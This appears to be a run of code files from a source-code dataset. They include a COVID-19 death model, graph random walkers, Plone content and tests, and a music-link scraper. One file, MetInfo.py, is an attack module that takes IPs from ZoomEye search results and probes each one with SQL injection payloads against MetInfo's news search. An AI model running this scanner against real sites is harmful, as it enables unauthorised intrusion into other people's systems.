\"\n#GET方法通过url后面追加键值对 key=value\n#GET取值方式:request.args.get(key)\n#POST方法通过form表单提交数据\n#POST取值方式:request.form.get(name)\n@app.route(\"/login/\",methods=[\"GET\",\"POST\"])\ndef Login():\n\tif request.method == \"POST\":\n\t\t#print request.args\n\t\tgetName = request.form.get(\"username\")\n\t\tgetPsw = request.form.get(\"userpsw\")\n\n\t\treturn getName + getPsw\n\treturn render_template(\"login.html\")\n\n\nif __name__ == \"__main__\":\n\tapp.run(host=\"127.0.0.1\",port=4000)\n","sub_path":"Python/Project3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190557474","text":"\"\"\"Python module for COVID-19 Survival-Convolution Death Model.\n\nIn this module we focus on predicting the number of deaths with a similar\napproach to modeling the number of infections.\n\"\"\"\nfrom typing import Optional, Sequence, Text, Tuple\nimport numpy as np\nimport tensorflow as tf\nimport piecewise_linear_infection_model as infection_model\ntf.keras.backend.set_floatx('float64')\n\nAVE_DAYS_TO_OUTCOME = 18.6\nDEFAULT_MAX_INTERVENTION = 40\n\n\nclass Covid19DeathPredictModel(infection_model.Covid19InfectionsPredictModel):\n \"\"\"Model to predict the number of cases dying from Covid-19.\n\n Attributes:\n w: hazard rate parameter used in defining the survival function that\n specifies the average of time until an infected patient becoming\n symptomatic and being diagnosed positive.\n\n death_rate: a variable that indicates probability of death given infection.\n\n \"\"\"\n\n def __init__(self,\n max_intervention: int = DEFAULT_MAX_INTERVENTION,\n **kwargs):\n \"\"\"Initializes an instance of Covid19DeathPredictModel.\"\"\"\n self._max_intervention = max_intervention\n self.w = tf.Variable(\n kwargs.pop(\"initial_guess_w\", AVE_DAYS_TO_OUTCOME),\n name=\"w\",\n dtype=tf.float64,\n trainable=kwargs.pop(\"variable_w_trainable\", True))\n trainable_death_rate = kwargs.pop(\"variable_death_rate_trainable\", True)\n initial_guess_death_rate = kwargs.pop(\"initial_guess_death_rate\", 0.04)\n super(Covid19DeathPredictModel, self).__init__(**kwargs)\n self.death_rate = tf.Variable(\n np.ones([self._n_weights, 1]) * initial_guess_death_rate,\n name=\"death_rate\",\n dtype=tf.float64,\n trainable=trainable_death_rate)\n\n def get_outcome_survival_probs(self):\n \"\"\"Returns survival probabilities of time from onset to final outcome.\"\"\"\n surv = tf.math.exp(\n tf.multiply(\n - 1. / self.w,\n tf.range(self._max_intervention, dtype=tf.float64)))\n return (surv - surv[self._max_intervention - 1]) / (\n 1. - surv[self._max_intervention - 1])\n\n def get_death_conv_weights(self):\n \"\"\"Returns the convolutional weights for modeling daily death numbers.\n\n These are the probability mass functions of the time from a case being\n infected until observing the final outcome (recovery / death). They are\n based on the assumption that: the incubation period, and the time between\n infection and final outcome (death / recovery) are independent.\n \"\"\"\n symptomatic_surv = self.get_symptomatic_survival_probs()\n symptomatic_pmf = symptomatic_surv[:-1] - symptomatic_surv[1:]\n outcome_surv = self.get_outcome_survival_probs()\n outcome_pmf = outcome_surv[:-1] - outcome_surv[1:]\n\n return tf.squeeze(\n tf.nn.conv1d(\n tf.reshape(\n tf.pad(\n outcome_pmf,\n paddings=tf.constant(\n [[self._max_latency, self._max_latency - 1]]\n ),\n mode=\"CONSTANT\"),\n [1, 2 * self._max_latency + self._max_intervention - 2, 1]\n ),\n tf.reshape(\n tf.pad(\n symptomatic_pmf[::-1],\n paddings=tf.constant([[0, 1]]),\n mode=\"CONSTANT\"\n ),\n [self._max_latency, 1, 1]\n ), 1, \"VALID\"))\n\n def daily_death(self, inputs: np.ndarray,\n static_tensorshape: bool = False):\n \"\"\"Returns the number of daily new death cases in an array.\n\n Args:\n inputs: a reformulated sequence of predictors that fits tensorflow model.\n For the detailed formats, see method \"_get_trainable_x()\" in class\n Covid19InfectionsEstimator.\n static_tensorshape: if True, this method will return tensor with a fixed\n length in training a model. Otherwise, the length can be any positive\n integer, which is used in predicting the number of new confirmed cases\n in future.\n\n Raises:\n xxx\n\n Returns:\n A 1d tensor for storing the number of daily new death cases. The length\n is same as the length of argument \"inputs\".\n\n \"\"\"\n inputs_len = self._len_inputs if static_tensorshape else inputs.shape[0]\n daily_infected_cases = tf.reshape(\n tf.slice(\n self._daily_infected(inputs),\n begin=[0, self._max_latency - 1],\n size=[inputs_len, 1]\n ), [inputs_len])\n\n conv_weights_len = self._max_latency + self._max_intervention - 1\n conv_weights = self.get_death_conv_weights()\n if conv_weights.shape[0] != conv_weights_len:\n raise ValueError(\n f\"The length of convolutional weights {conv_weights.shape[0]} is \"\n f\"different from the expected value {conv_weights_len}.\")\n return tf.squeeze(\n tf.nn.conv1d(\n tf.reshape(\n tf.pad(\n daily_infected_cases,\n paddings=tf.constant(\n [[conv_weights_len - 1, 0]]\n ),\n mode=\"CONSTANT\"),\n [1, conv_weights_len + inputs_len - 1, 1]\n ),\n tf.reshape(\n conv_weights[::-1],\n [conv_weights_len, 1, 1]\n ), 1, \"VALID\")) * tf.reshape( # Allow death rate change over time.\n tf.matmul(inputs, (self.death_rate)), [inputs_len])\n\n def call(self, inputs: np.ndarray) -> infection_model.TensorType:\n \"\"\"Returns the number of deaths on a daily basis.\n\n This method needs to be overriden to subclass keras.Model.\n\n Args:\n inputs: a reformulated sequence of predictors that fits tensorflow model.\n For the detailed formats, see method \"_get_trainable_x()\" in class\n Covid19InfectionsEstimator.\n\n Returns:\n A 1d tensor for storing the number of daily new death cases. The length\n is same as the length of argument \"inputs\".\n\n \"\"\"\n return self.daily_death(inputs, True)\n\n\nclass Covid19DeathEstimator(infection_model.Covid19InfectionsEstimator):\n \"\"\"Selects the best model to predict Covid-19 death tolls.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initializes a Covid19DeathEstimator instance.\"\"\"\n super(Covid19DeathEstimator, self).__init__(**kwargs)\n\n def _fit_with_t0(self, data: Sequence[int], t0: int, message: Text,\n enable_tensorboard: bool = False,\n tensorboard_logdir: Optional[Text] = None\n ) -> Tuple[\n Covid19DeathPredictModel, infection_model.TensorType]:\n \"\"\"Returns the death toll model after training with a given t0.\n\n Args:\n data: training data (number of daily new death tolls) in a 1d array.\n t0: specifies the number of days between the occurrence of the first\n infected case (patient zero) and the first observed case.\n message: optionally pass a prefix string in the filenames of training\n weights (in the format of hdf5 file). We will generate a lot of such\n files in the training process.\n enable_tensorboard: whether or not use tensorboard to monitor training.\n tensorboard_logdir: xxx.\n\n Returns:\n model: the best model after training with t0.\n loss: the loss of the best model after training with t0.\n\n \"\"\"\n model = Covid19DeathPredictModel(\n n_weights=2 * len(self._knots) + 1 - sum(self._knots_connect),\n t0=t0,\n len_inputs=len(data) + t0,\n max_latency=self._estimator_args.get(\n \"max_latency\", infection_model.DEFAULT_MAX_LATENCY),\n max_intervention=self._estimator_args.get(\n \"max_intervention\", DEFAULT_MAX_INTERVENTION),\n **self._model_args)\n\n x = self._get_trainable_x(len(data), t0)\n # Pad t0 elements at front to be 0.\n y = np.pad(data, [t0, 0]).astype(np.float64)\n\n # Define the loss function for each t0 value. Compare the square-root\n # difference.\n def custom_loss(y_actual, y_pred):\n return self._estimator_args.get(\n \"loss_function\", tf.keras.losses.MSE)(\n# tf.math.sqrt(y_actual[t0:]), tf.math.sqrt(y_pred[t0:]))\n (y_actual[t0:]), (y_pred[t0:]))\n optimizer_option = self._estimator_args.get(\n \"optimizer\", tf.keras.optimizers.Adam)\n optimizer = optimizer_option(\n learning_rate=self._estimator_args.get(\"learning_rate\", 0.01),\n clipnorm=1.0)\n model.compile(optimizer, custom_loss)\n callbacks, min_loss_filepath = Covid19DeathEstimator._setup_callbacks(\n message, t0, enable_tensorboard, tensorboard_logdir)\n\n model.fit(\n x, y, epochs=self._estimator_args.get(\"epochs\", 100),\n batch_size=len(data) + t0, shuffle=False,\n verbose=self._estimator_args.get(\"verbose\", 0),\n callbacks=callbacks)\n\n model.load_weights(min_loss_filepath)\n loss = custom_loss(y, model(x))\n return model, loss\n\n def predict_death(self, duration: int,\n flatten_future: bool = False) -> Optional[\n infection_model.TensorType]:\n \"\"\"Predicts the number of new death cases reported on each day.\n\n Args:\n duration: specifies the number of days for prediction.\n flatten_future: this parameter takes effect in prediction only,\n indicating whether the infection rate or death rate is flattened in\n the future.\n\n Returns:\n The number of daily new death cases in 1d tensor. The length is equal to\n the value of duration.\n\n \"\"\"\n if self._final_model is None:\n return None\n x_pred = self._get_trainable_x(\n duration, self._final_model.t0, flatten_future)\n return self._final_model.daily_death(x_pred)[self._final_model.t0:]\n","sub_path":"python/code state/death_model.py","file_name":"death_model.py","file_ext":"py","file_size_in_byte":9698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239582532","text":"import requests\nimport json\nimport re\nimport config\n\n\ndef handler(link):\n\n global zingcookie\n link = link.replace(\"m.\", \"\")\n s = requests.Session()\n r = s.get(link, cookies=config.zingcookie)\n\n code = re.search('data-code=\\\"([a-zA-Z0-9]{20,30})\\\"', r.text).group(1)\n xml = re.search('data-xml=\\\"(.+)\\\"', r.text).group(1)\n\n data = s.get(\"http://mp3.zing.vn\" + xml, cookies=config.zingcookie).text\n dedata = json.loads(data)\n\n title = dedata['data'][0]['name']\n artist = dedata['data'][0]['artist']\n thumbnail = dedata['data'][0]['cover']\n\n content = s.get(\"http://mp3.zing.vn/json/song/get-download?code=\" + code, cookies=config.zingcookie).text\n decoded = json.loads(content)\n\n msg = decoded['msg']\n\n if msg:\n return msg\n\n link128 = \\\n s.get('http://mp3.zing.vn' + decoded['data']['128']['link'], cookies=config.zingcookie, allow_redirects=False).headers[\n 'Location']\n\n try:\n link320 = \\\n s.get('http://mp3.zing.vn' + decoded['data']['320']['link'], cookies=config.zingcookie, allow_redirects=False).headers[\n 'Location']\n except:\n link320 = \"\"\n lossless = \"\"\n return title, artist, thumbnail, link128, link320, lossless\n try:\n lossless = s.get('http://mp3.zing.vn' + decoded['data']['lossless']['link'], cookies=config.zingcookie,\n allow_redirects=False).headers['Location']\n except:\n lossless = \"\"\n return title, artist, thumbnail, link128, link320, lossless\n\n return title, artist, thumbnail, link128, link320, lossless","sub_path":"modules/zmp3.py","file_name":"zmp3.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"42440991","text":"# -*- coding: utf-8 -*-\n\nimport random\n\nimport numpy as np\n\n\ndef deepwalk_walk_wrapper(class_instance, walk_length, start_node):\n class_instance.deepwalk_walk(walk_length, start_node)\n\n\nclass BasicWalker:\n def __init__(self, G, workers):\n self.G = G.G\n self.node_size = G.node_size\n self.look_up_dict = G.look_up_dict\n\n def deepwalk_walk(self, walk_length, start_node):\n '''\n Simulate a random walk starting from start node.\n '''\n\n walk = [start_node]\n\n while len(walk) < walk_length:\n cur = walk[-1]\n cur_nbrs = list(self.G.neighbors(cur))\n if len(cur_nbrs) > 0:\n walk.append(random.choice(cur_nbrs))\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n '''\n Repeatedly simulate random walks from each node.\n '''\n walks = []\n nodes = list(self.G.nodes())\n print('Begin random walks...')\n for walk_iter in range(num_walks):\n # pool = multiprocessing.Pool(processes = 4)\n # print(str(walk_iter+1), '/', str(num_walks))\n random.shuffle(nodes)\n for node in nodes:\n # walks.append(pool.apply_async(deepwalk_walk_wrapper, (self, walk_length, node, )))\n walks.append(self.deepwalk_walk(\n walk_length=walk_length, start_node=node))\n # pool.close()\n # pool.join()\n # print(len(walks))\n print('Walk finished...')\n return walks\n\n\nclass Walker:\n def __init__(self, G, p, q, update, workers):\n self.G = G.G\n self.p = p\n self.q = q\n self.node_size = G.node_size\n self.look_up_dict = G.look_up_dict\n self.update = update\n self.alias_nodes = {}\n self.alias_edges = {}\n\n def node2vec_walk(self, walk_length, start_node):\n '''\n Simulate a random walk starting from start node.\n '''\n\n walk = [start_node]\n\n while len(walk) < walk_length:\n cur = walk[-1]\n cur_nbrs = list(self.G.neighbors(cur))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(\n cur_nbrs[alias_draw(self.alias_nodes[cur][0], self.alias_nodes[cur][1])])\n else:\n prev = walk[-2]\n pos = (prev, cur)\n next = cur_nbrs[alias_draw(self.alias_edges[pos][0],\n self.alias_edges[pos][1])]\n walk.append(next)\n else:\n break\n\n return walk\n\n def simulate_walks(self, num_walks, walk_length, vectors):\n '''\n Repeatedly simulate random walks from each node.\n '''\n walks = []\n nodes = list(self.G.nodes())\n print('Begin random walk...')\n for walk_iter in range(num_walks):\n # print(str(walk_iter+1), '/', str(num_walks))\n random.shuffle(nodes)\n for node in nodes:\n if self.update and node in vectors.keys():\n continue\n walks.append(self.node2vec_walk(\n walk_length=walk_length, start_node=node))\n print('Walk finished...')\n return walks\n\n def get_alias_edge(self, src, dst):\n '''\n Get the alias edge setup lists for a given edge.\n '''\n\n unnormalized_probs = []\n for dst_nbr in self.G.neighbors(dst):\n if dst_nbr == src:\n unnormalized_probs.append(self.G[dst][dst_nbr]['weight'] / self.p)\n elif self.G.has_edge(dst_nbr, src):\n unnormalized_probs.append(self.G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(self.G[dst][dst_nbr]['weight'] / self.q)\n norm_const = sum(unnormalized_probs)\n if norm_const > 0.0:\n normalized_probs = [\n float(u_prob) / norm_const for u_prob in unnormalized_probs]\n else:\n normalized_probs = unnormalized_probs\n\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n '''\n Preprocessing of transition probabilities for guiding the random walks.\n '''\n for node in self.G.nodes():\n if self.update and node in self.alias_nodes.keys():\n continue\n unnormalized_probs = [self.G[node][nbr]['weight']\n for nbr in self.G.neighbors(node)]\n norm_const = sum(unnormalized_probs)\n if norm_const > 0.0:\n normalized_probs = [\n float(u_prob) / norm_const for u_prob in unnormalized_probs]\n else:\n normalized_probs = unnormalized_probs\n self.alias_nodes[node] = alias_setup(normalized_probs)\n\n triads = {}\n\n for edge in self.G.edges():\n if self.update and edge in self.alias_edges.keys():\n continue\n self.alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n\n return\n\n\ndef alias_setup(probs):\n '''\n Compute utility lists for non-uniform sampling from discrete distributions.\n Refer to https://hips.seas.harvard.edu/blog/2013/03/03/the-alias-method-efficient-sampling-with-many-discrete-outcomes/\n for details\n '''\n K = len(probs)\n q = np.zeros(K, dtype=np.float32)\n J = np.zeros(K, dtype=np.int32)\n\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n if q[kk] < 1.0:\n smaller.append(kk)\n else:\n larger.append(kk)\n\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n\n J[small] = large\n q[large] = q[large] + q[small] - 1.0\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n\n return J, q\n\n\ndef alias_draw(J, q):\n '''\n Draw sample from a non-uniform discrete distribution using alias sampling.\n '''\n K = len(J)\n\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n","sub_path":"src/bionev/OpenNE/walker.py","file_name":"walker.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"519781316","text":"import cv2\nimport numpy as np\n\ndef main():\n\n cap = cv2.VideoCapture(1)\n\n while (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Display the resulting frame\n cv2.imshow('frame', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"_main_\":\n main()\n\n#3b img_ds bruitee\n# -> image binaire est tres bruitee\n# -> 2 solutions pour ameliorer le resultat\n# -> a) prefiltrage de img_ds.jpg avant binaritation\n# -> b) post-traitement de l'image binaire a l'aide d'operateurs de morphologie mathematique (CF TE4)\n","sub_path":"COURS_3.2_Video.py","file_name":"COURS_3.2_Video.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"546383559","text":"\"\"\"Definition of the Article content type\n\"\"\"\n\nfrom zope.interface import implements, directlyProvides\nfrom zope.component import adapter, getUtility\n\nfrom Acquisition import aq_inner, aq_parent\nfrom DateTime import DateTime\n\nfrom Products.CMFCore.utils import getToolByName\n\nfrom Products.Archetypes import atapi\nfrom Products.ATContentTypes.content import base\nfrom Products.ATContentTypes.content import schemata\n\n# import additional widget UploadReferenceWidget for usage\n# with the file and image attachments\nfrom Products.UploadReferenceWidget.widget import UploadReferenceWidget\n\nfrom weka.content import contentMessageFactory as _\nfrom weka.content.interfaces import IArticle\nfrom weka.content.config import PROJECTNAME\n\nArticleSchema = schemata.ATContentTypeSchema.copy() + atapi.Schema((\n\n # -*- Your Archetypes field definitions here ... -*-\n \n atapi.StringField(\n name='kicker',\n searchable=True,\n widget=atapi.StringWidget(\n label=_(u\"Kicker\"),\n ),\n required=True,\n ),\n \n atapi.ReferenceField(\n name='images',\n allowed_portal_types=('Image'),\n relationship='imageattachment',\n multiValued=True,\n widget=UploadReferenceWidget(\n label=_(u\"Images\"),\n description=_(u\"Upload or select existing images.\"),\n startup_directory='/images',\n ),\n ),\n \n atapi.StringField(\n name='imageCaption',\n searchable=True,\n widget=atapi.StringWidget(\n label=_(u\"Caption\"),\n ),\n ),\n \n atapi.StringField(\n name='imageSource',\n widget=atapi.StringWidget(\n label=_(u\"Image Source\"),\n description=_(u\"Name of exernal image source.\"),\n ),\n ),\n \n atapi.StringField(\n name='imageSourceUrl',\n widget=atapi.StringWidget(\n label=_(u\"Image Source URL\"),\n description=_(u\"URL of external image source.\"),\n ),\n ),\n \n atapi.TextField(\n name='text',\n searchable=True,\n default_output_type='text/x-html-safe',\n validators=('isTidyHtmlWithCleanup'),\n widget=atapi.RichWidget(\n label=_(u\"Text\"),\n description=_(u\"Text that will be displayed above the content ad.\"),\n allow_file_upload=False,\n rows=15,\n ),\n required=True,\n ),\n \n atapi.TextField(\n name='textBottom',\n searchable=True,\n default_output_type='text/x-html-safe',\n validators=('isTidyHtmlWithCleanup'),\n widget=atapi.RichWidget(\n label=_(u\"Text Bottom\"),\n description=_(u\"Text that will be displayed below the content ad.\"),\n allow_file_upload=False,\n rows=25,\n ),\n required=False,\n ),\n \n \n atapi.ReferenceField(\n name='files',\n allowed_portal_types=('Files'),\n relationship='fileattachment',\n multiValued=True,\n widget=UploadReferenceWidget(\n label=_(u\"File Attachments\"),\n description=_(u\"File attachments associated with this article, e.g. a printed version that should be available for download.\"),\n startup_directory='/files',\n ),\n ),\n\n))\n\n# Set storage on fields copied from ATContentTypeSchema, making sure\n# they work well with the python bridge properties.\n# NOTE: we set storage on our custom fields as well - this could have\n# been done in the field declarations, but keeping things in one central\n# place helps keeping track [Chris]\n\nArticleSchema['title'].storage = atapi.AnnotationStorage()\nArticleSchema['description'].storage = atapi.AnnotationStorage()\nArticleSchema['description'].widget.label = _(u\"Teaser\")\nArticleSchema['description'].widget.description = _(u\"\")\nArticleSchema['kicker'].storage = atapi.AnnotationStorage()\nArticleSchema['images'].storage = atapi.AnnotationStorage()\nArticleSchema['imageCaption'].storage = atapi.AnnotationStorage()\nArticleSchema['imageSource'].storage = atapi.AnnotationStorage()\nArticleSchema['imageSourceUrl'].storage = atapi.AnnotationStorage()\nArticleSchema['text'].storage = atapi.AnnotationStorage()\nArticleSchema['textBottom'].storage = atapi.AnnotationStorage()\nArticleSchema['files'].storage = atapi.AnnotationStorage()\n\nschemata.finalizeATCTSchema(ArticleSchema, moveDiscussion=False)\n\nclass Article(base.ATCTContent):\n \"\"\"A basic article as a substitute for default document\"\"\"\n implements(IArticle)\n\n portal_type = \"Article\"\n _at_rename_after_creation = True\n \n schema = ArticleSchema\n \n # Reorder fields in ArticleSchema\n schema.moveField('kicker', before='title')\n \n\n # Map Python properties to Archetype schema\n kicker = atapi.ATFieldProperty('kicker')\n title = atapi.ATFieldProperty('title')\n description = atapi.ATFieldProperty('description')\n images = atapi.ATReferenceFieldProperty('images')\n image_caption = atapi.ATFieldProperty('imageCaption')\n image_source = atapi.ATFieldProperty('imageSource')\n image_url = atapi.ATFieldProperty('imageSourceUrl')\n text = atapi.ATFieldProperty('text')\n text_bottom = atapi.ATFieldProperty('textBottom')\n files = atapi.ATReferenceFieldProperty('files')\n\natapi.registerType(Article, PROJECTNAME)\n","sub_path":"src/weka.content/weka/content/content/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"561879761","text":"#!/bin/env python\n#encoding:utf-8\n\nimport re\nimport sys\nsys.path.append(\"../../\")\nimport urllib2\nimport json\nimport pickle,pprint\n\nfrom lib.core.data import logger\n\n\ndef readSearchResult(file):\n\tf = open(file,\"rb\")\n\tdata = pickle.load(f)\n\t#pprint.pprint(data)\n\tf.close()\n\treturn data\n\ndef attack(url):\n\ta = \"http://{target}/news/index.php?\".format(target=url)\n\n\tplayLoadTrue = \"http://{target}/news/index.php?\"\\\n\t\t\t\"search_sql=%20123qwe%20\"\\\n\t\t\t\"where%201234%3D1234%20--%20x&imgproduct=xxxx\".format(target=url)\n\n\tplayLoadFalse = \"http://{target}/news/index.php?\"\\\n\t\t\t\"serch_sql=%20123qwe%20\"\\\n\t\t\t\"where%201234%3D1235%20--%20x&imgproduct=xxxx\".format(target=url)\n\ttry:\n\t\treq = urllib2.Request(playLoadTrue)\n\t\tresp = urllib2.urlopen(req)\n\t\tif resp.code != 200:\n\t\t\treturn\n\t\tdata_true = resp.read()\n\n\t\t#print data_true\n\t\tif not re.search(r'href=[\"\\' ]shownews\\.php\\?lang=', data_true, re.M):\n\t\t\t\treturn\n\n\t\treq = urllib2.Request(playLoadFalse)\n\t\tresp = urllib2.urlopen(req)\n\t\tif resp.code != 200:\n\t\t\treturn\n\t\tdata_false = resp.read()\n\t\t#print data_false\n\n\t\tif re.search(r'href=[\"\\' ]shownews\\.php\\?lang=', data_false, re.M):\n\t\t\treturn\n\n\t\tlogger.info(\"%s is vulnerable!\" % url)\n\texcept:\n\t\tpass\n\ndef main(file):\n\tlogger.info(\"Attack module MetInfo is running\")\n\tip_list = []\n\tdata = readSearchResult(file)\n\tfor x in data['matches']:\n\t\tlogger.info(\"find ip:{0}\".format( x['ip']))\n\t\tip_list.append(x['ip'])\n\tfor ip in ip_list:\n\t\tattack(ip)\n","sub_path":"app-sim/src/app/zoomeye/MetInfo.py","file_name":"MetInfo.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"634275940","text":"# Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the \n# sum of the first 100 numbers. \ndef sumSquare():\n list1 = []\n x = 1\n # made list of 1-100\n for i in range(100):\n list1.append(x)\n x += 1\n # made list with 1-100 squared\n squares = []\n for number in list1:\n squares.append(pow(number, 2))\n sumOfSquares = sum(squares)\n # squaring the sum of the list of 1-100\n squareOfSum = pow(sum(list1), 2)\n print(squareOfSum - sumOfSquares)\nsumSquare()\n","sub_path":"SeeTheSaenz/standardlibrary/euler1-10/euler6.py","file_name":"euler6.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"407803725","text":"# -*- coding: UTF-8 -*-\n\nfrom email.MIMEText import MIMEText\nfrom zope.component import getUtility, getMultiAdapter, getSiteManager\nfrom zope.component.interfaces import IObjectEvent\nfrom zope.interface import implements\n\nfrom plone.app.contentrules.rule import Rule\nfrom plone.app.contentrules.tests.base import ContentRulesTestCase\nfrom plone.contentrules.engine.interfaces import IRuleStorage\nfrom plone.contentrules.rule.interfaces import IRuleAction, IExecutable\nfrom collective.contentrules.mailfromfield.actions.mail import MailFromFieldAction\nfrom collective.contentrules.mailfromfield.actions.mail import MailFromFieldEditForm, MailFromFieldAddForm\n\nfrom Products.MailHost.interfaces import IMailHost\nfrom Products.SecureMailHost.SecureMailHost import SecureMailHost\n\n# basic test structure copied from plone.app.contentrules test_action_mail.py\n\n\nclass DummyEvent(object):\n implements(IObjectEvent)\n\n def __init__(self, object):\n self.object = object\n\n\nclass DummySecureMailHost(SecureMailHost):\n meta_type = 'Dummy secure Mail Host'\n\n def __init__(self, id):\n self.id = id\n self.sent = []\n\n def _send(self, mfrom, mto, messageText, debug=False):\n self.sent.append(messageText)\n\n\nclass TestMailAction(ContentRulesTestCase):\n\n def afterSetUp(self):\n self.setRoles(('Manager', ))\n self.portal.invokeFactory('Folder', 'target', title=unicode('Càrtella', 'utf-8'))\n self.portal.target.invokeFactory('Document', 'd1', title=unicode('Dòcumento', 'utf-8'))\n self.folder = self.portal.target\n\n def testRegistered(self):\n element = getUtility(IRuleAction, name='plone.actions.MailFromField')\n self.assertEquals('plone.actions.MailFromField', element.addview)\n self.assertEquals('edit', element.editview)\n self.assertEquals(None, element.for_)\n self.assertEquals(IObjectEvent, element.event)\n\n def testInvokeAddView(self):\n element = getUtility(IRuleAction, name='plone.actions.MailFromField')\n storage = getUtility(IRuleStorage)\n storage[u'foo'] = Rule()\n rule = self.portal.restrictedTraverse('++rule++foo')\n\n adding = getMultiAdapter((rule, self.portal.REQUEST), name='+action')\n addview = getMultiAdapter((adding, self.portal.REQUEST),\n name=element.addview)\n self.failUnless(isinstance(addview, MailFromFieldAddForm))\n\n addview.createAndAdd(data={'subject': 'My Subject',\n 'source': 'foo@bar.be',\n 'fieldName': 'foo',\n 'target': 'object',\n 'message': 'Hey, Oh!'})\n\n e = rule.actions[0]\n self.failUnless(isinstance(e, MailFromFieldAction))\n self.assertEquals('My Subject', e.subject)\n self.assertEquals('foo@bar.be', e.source)\n self.assertEquals('foo', e.fieldName)\n self.assertEquals('object', e.target)\n self.assertEquals('Hey, Oh!', e.message)\n\n def testInvokeEditView(self):\n element = getUtility(IRuleAction, name='plone.actions.MailFromField')\n e = MailFromFieldAction()\n editview = getMultiAdapter((e, self.folder.REQUEST),\n name=element.editview)\n self.failUnless(isinstance(editview, MailFromFieldEditForm))\n\n def testExecuteNoSource(self):\n self.loginAsPortalOwner()\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.message = 'Document created !'\n e.fieldName = 'foo_attr'\n e.target = 'object'\n self.folder.foo_attr = 'member1@dummy.org'\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n self.assertRaises(ValueError, ex)\n # if we provide a site mail address this won't fail anymore\n sm.manage_changeProperties({'email_from_name': 'The Big Boss',\n 'email_from_address': 'manager@portal.be',\n })\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"The Big Boss \",\n mailSent.get('From'))\n self.assertEqual(\"Document created !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteSimpleByAttribute(self):\n self.loginAsPortalOwner()\n self.folder.foo_attr = 'member1@dummy.org'\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_attr'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteTargetByAttribute(self):\n self.loginAsPortalOwner()\n self.folder.d1.foo_attr = 'member1@dummy.org'\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_attr'\n e.target = 'target'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n 